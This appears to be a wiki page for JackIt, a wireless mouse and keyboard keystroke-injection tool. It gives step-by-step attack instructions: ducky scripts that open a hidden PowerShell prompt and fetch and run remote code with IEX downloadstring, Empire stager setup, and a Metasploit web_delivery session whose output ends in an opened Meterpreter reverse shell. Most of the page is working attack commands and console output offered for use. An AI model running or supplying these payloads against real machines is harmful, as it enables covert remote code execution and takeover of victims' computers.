-
Notifications
You must be signed in to change notification settings - Fork 149
Home
The default ducky stager generated by Empire is not recommended. The reason for this is simple: When you use a USB rubber ducky, the assumption is that the user is not physically present. When attacking wirelessly, you may have to inject your attack when the user becomes momentarily distracted. Speed is of the essence.
The other factor to consider is whether the target device uses NRF24 radio frames that incorporate sequence numbering. All MS wireless devices use a 16-bit sequence number field. This means that if the user starts moving their mouse while you're injecting, the sequence numbers of the frames you're sending won't line up anymore. This will result in dropped keystrokes.
The default ducky stager looks something like this:
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc <Base64 Payload>
ENTER
First, the long initial delay is not required. The USB device is already detected, so there's no wait time to detect a new device and install drivers. Second, most machines can display the run dialog in less than 200ms. Finally, we don't really need to launch from a command prompt.
To shorten the attack, startup Empire and create a launcher. After the launcher is configured and running, create a stager:
(Empire) > usestager launcher
(Empire: stager/launcher) > set Listener 1
(Empire: stager/launcher) > set Base64 False
(Empire: stager/launcher) > set OutFile launcher.ps1
(Empire: stager/launcher) > generate
[*] Stager output written out to: launcher.ps1
The next set of commands assumes the callback machine is running Kali Linux. Move the generated file to the default web root and start the apache2 service:
root@kali:~/empire# cp launcher.ps1 /var/www/html/p
root@kali:~/empire# service apache2 start
Now your payload can leverage the initial stage via a standard PS download cradle. For example, my ducky script looks like this:
GUI r
DELAY 200
STRING powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('http://192.168.1.5/p')"
ENTER
Be sure to substitute the URL for your callback machine. We've now cut our injection time down to less than half a second, which will make our attack much more reliable.
There are many other ways to stage in a payload. @subTee has a few examples such as this gem. Be creative. URL shorteners are your friend.
Cobalt Strike has a feature called scripted web delivery which can be used to generate a suitable Powershell one-liner. It is documented on the Cobalt Strike site, and there's a video showing how to use it.
In the video demonstration, Raphael pastes the one-liner into the run dialog. When using JackIt, use the Empire ducky payload but swap out Powershell command with the Cobalt Strike generated one-liner.
Metasploit has a module called Web Delivery. It includes a Powershell stager similar to Empire.
To use this feature, startup msfconsole
and enter the following commands:
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(web_delivery) > set LPORT 443
LPORT => 443
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(web_delivery) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf exploit(web_delivery) > set SRVPORT 80
SRVPORT => 80
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.5 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.5 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 PSH
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.1.5:443
[*] Using URL: http://192.168.1.5:80/vqpo4vnRv6
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.1.5/vqpo4vnRv6');
Use the correct IP addresses or hostnames, and the payload and callback ports of your choice. Your ducky script should look similar to the example below:
GUI r
DELAY 200
STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.1.5/vqpo4vnRv6');
ENTER
Launch JackIt and perform the injection attack. You should see your payload callback and a new Meterpreter session:
msf exploit(web_delivery) >
[*] Delivering Payload
[*] https://192.168.1.5:443 handling request from 192.168.1.4; (UUID: rlf3v2nf) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.1.5:443 -> 192.168.1.4:50523) at 2016-07-16 13:30:30 -0400
If you experience issues, remember the following:
- Windows Defender will catch this by default. AV evasion is not in scope for this wiki. There are a million online references about this. Start here.
- Don't cut and paste the example above. You will need to use your IP address and/or hostname, and the script callback URI is randomly generated so be sure to copy the payload generated by Metasploit.
Some users have reported that special characters do not work correctly. This is likely caused by not using a standard US keyboard layout. We have now added a --layout
option with support for several different keyboards. This option is in beta, so let us now if there are any issues.